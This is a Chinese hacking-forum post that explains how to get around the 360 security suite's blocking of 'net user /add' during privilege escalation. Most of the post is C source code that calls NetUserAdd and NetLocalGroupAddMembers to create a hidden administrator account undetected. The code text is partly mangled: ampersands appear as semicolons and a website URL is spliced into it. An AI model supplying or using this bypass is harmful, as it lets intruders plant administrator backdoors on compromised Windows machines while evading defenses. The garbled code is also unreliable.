管理员
|
阅读:1766回复:0
突破360防黑加固添加用户
楼主#
更多
发布于:2013-01-18 14:57
 | |  |  | 360功能多,现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹,提权的时候经常会用到netuser xxx xxx /add;net localgroup xxx xxx/add.360会拦截,如图: net user 和 net1 user都被拦截了,改名执行也拦截,想想这功能也不能这么鸡肋。当然360还会拦截其他命令,这次只对net user xxx xx/add做讨论。于是索性自己用C写一个吧,果断被360无视了,如图: 源码: //Code by pnig0s //Date:2012,3,17 #include <stdio.h>#include <Windows.h>#include <lm.h>#pragma comment(lib,"Netapi32.lib")int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);BOOL ImprovePriv(LPWSTR name);int main(INT argc,char * argv[]){BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME);if(argc < 3){printf("\nCode by Pnig0s1992");printf("\nUsage:");printf("\n\t%s UserName Password",argv[0]);printf("\n\tRemark:Default add to Group:Administrators.");return -1;}if(bResult){printf("Successfully promote priv!");}else{printf("Failed promote priv.");return -1;}int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0);wchar_t *wUserName =new wchar_t[Namesize+1];if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize)){return false;}int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0);wchar_t *wPassword =new wchar_t[Passsize+1];if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize)){return false;}LPTSTR lpName = wUserName;LPTSTR lpPassword = wPassword;LPWSTR lpSevName = NULL;LPWSTR lpGroupName = L"Administrators";AddUser(lpName,lpPassword,lpSevName);SetGroup(lpName,lpSevName,lpGroupName);return 0;}BOOL ImprovePriv(LPWSTR name){HANDLE hToken;if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,;hToken)){printf("\nGet process token failed.(%d)",GetLastError());return FALSE;}TOKEN_PRIVILEGES tkp;tkp.PrivilegeCount = 1;if(!LookupPrivilegeValue(NULL,name,;tkp.Privileges[0].Luid)){printf("\nLookup process priv failed.(%d)",GetLastError());return FALSE;}tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;if(!AdjustTokenPrivileges(hToken,FALSE,;tkp,0,NULL,NULL)){printf("\nAjust process priv failed.(%d)",GetLastError());return FALSE;}CloseHandle(hToken);return TRUE;}www.atcpu.comint AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName){USER_INFO_1 ui;DWORD dwLevel = 1;DWORD dwError = 0;NET_API_STATUS nStatus;ui.usri1_name = lpUsername;ui.usri1_password = lpPassword;ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE);ui,;dwError);if(nStatus == NERR_Success){printf("\nAdd user:%S successfully!",lpUsername);}else{printf("\nAdd user failed:%d.",nStatus);}return 0;}int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName){NET_API_STATUS nStatus;LOCALGROUP_MEMBERS_INFO_3 lgui;lgui.lgrmi3_domainandname = lpUsername;nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE);lgui,1);if(nStatus == NERR_Success){printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);}else if(nStatus == NERR_GroupNotFound){printf("\nCan't find such a group:%S.",lpGroupName);}else{printf("\nSet GROUP:%S failed.",lpGroupName);}return 0;}
| |  | |  |
|
